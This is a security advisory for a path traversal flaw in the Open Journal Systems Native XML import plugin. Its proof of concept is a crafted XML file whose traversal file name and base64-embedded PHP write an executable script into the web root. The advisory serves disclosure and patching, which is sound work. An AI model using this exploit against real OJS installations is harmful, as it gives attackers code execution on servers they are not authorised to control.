egix@karmainsecurity ~ $

Open Journal Systems <= 3.5.0-1 (NativeXmlIssueGalleyFilter.php) Path Traversal Vulnerability

• Software Links:

https://pkp.sfu.ca/software/ojs/

https://github.com/pkp/ojs

• Affected Versions:

Version 3.3.0-21 and prior versions.

Version 3.4.0-9 and prior versions.

Version 3.5.0-1 and prior versions.

• Vulnerability Description:

The vulnerability exists because user input passed to the “Native XML Plugin” through the issue -> issue_galleys -> issue_galley -> issue_file -> file_name tag of the imported XML file is not properly sanitized before being used to set the “server-side file name”, which is later used as the final part of a variable which is used at in a call to the writeFile() method without proper validation. This can be exploited to write/overwrite arbitrary files on the web server via Path Traversal sequences, potentially leading to, e.g., execution of arbitrary PHP code (RCE).

Successful exploitation of this vulnerability requires an account with permissions to access the “Import/Export” plugin (“Native XML Plugin”), such as a “Journal Editor” or “Production Editor” user account. Furthermore, in order to perform the following Remote Code Execution (RCE) attack, the attacker should know or guess/disclose the webserver path in which OJS is located (e.g. /var/www/html/ojs-3.5.0-1).

• Proof of Concept:

  1. Login with an account with permissions to access the “Import/Export” plugin (such as a “Journal Editor” or “Production Editor”)
  2. In the Dashboard, click on Tools -> Native XML Plugin
  3. Edit the following XML file by setting the appropriate webserver path of your OJS instance instead of /var/www/html/ojs-3.5.0-1:
<?xml version="1.0" encoding="utf-8"?>
<issue xmlns="http://pkp.sfu.ca" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" published="0" current="0" access_status="1" url_path="" xsi:schemaLocation="http://pkp.sfu.ca native.xsd">
  <id type="internal" advice="ignore">1</id>
  <issue_identification>
    <volume>1</volume>
    <number>1</number>
    <year>2025</year>
    <title>RCE</title>
  </issue_identification>
  <issue_galleys xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://pkp.sfu.ca native.xsd">
    <issue_galley>
      <label>RCE</label>
      <id type="internal" advice="ignore">1</id>
      <issue_file>
        <file_name>/../../../../../../../../../../../../../../../../../../var/www/html/ojs-3.5.0-1/public/rce.php</file_name>
        <file_type>text/x-php</file_type>
        <file_size>20</file_size>
        <content_type>1</content_type>
        <original_file_name>rce.php</original_file_name>
        <date_uploaded>2025-10-21</date_uploaded>
        <date_modified>2025-10-21</date_modified>
        <embed encoding="base64">PD9waHAgcGhwaW5mbygpOyA/Pgo=</embed>
      </issue_file>
    </issue_galley>
  </issue_galleys>
  <articles xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://pkp.sfu.ca native.xsd"/>
</issue>
  1. Upload and import the edited XML file, it should produce an error message
  2. Nevertheless, the arbitrary PHP script (rce.php) will be created into the /public directory and can be accessed by the attacker, leading to Remote Code Execution (RCE)

• Solution:

Upgrade to versions 3.3.0-22, 3.4.0-10, 3.5.0-2, or later.

• Disclosure Timeline:

[21/10/2025] – Vendor notified

[24/10/2025] – Vendor fixed the issue and opened a public GitHub issue: https://github.com/pkp/pkp-lib/issues/11973

[12/11/2025] – CVE identifier requested

[20/11/2025] – Version 3.3.0-22 released

[22/11/2025] – Version 3.4.0-10 released

[12/12/2025] – CVE identifier assigned

[29/11/2025] – Version 3.5.0-2 released

[23/12/2025] – Publication of this advisory

• CVE Reference:

The Common Vulnerabilities and Exposures program (cve.org) has assigned the name CVE-2025-67890 to this vulnerability.

• Credits:

Vulnerability discovered by Egidio Romano.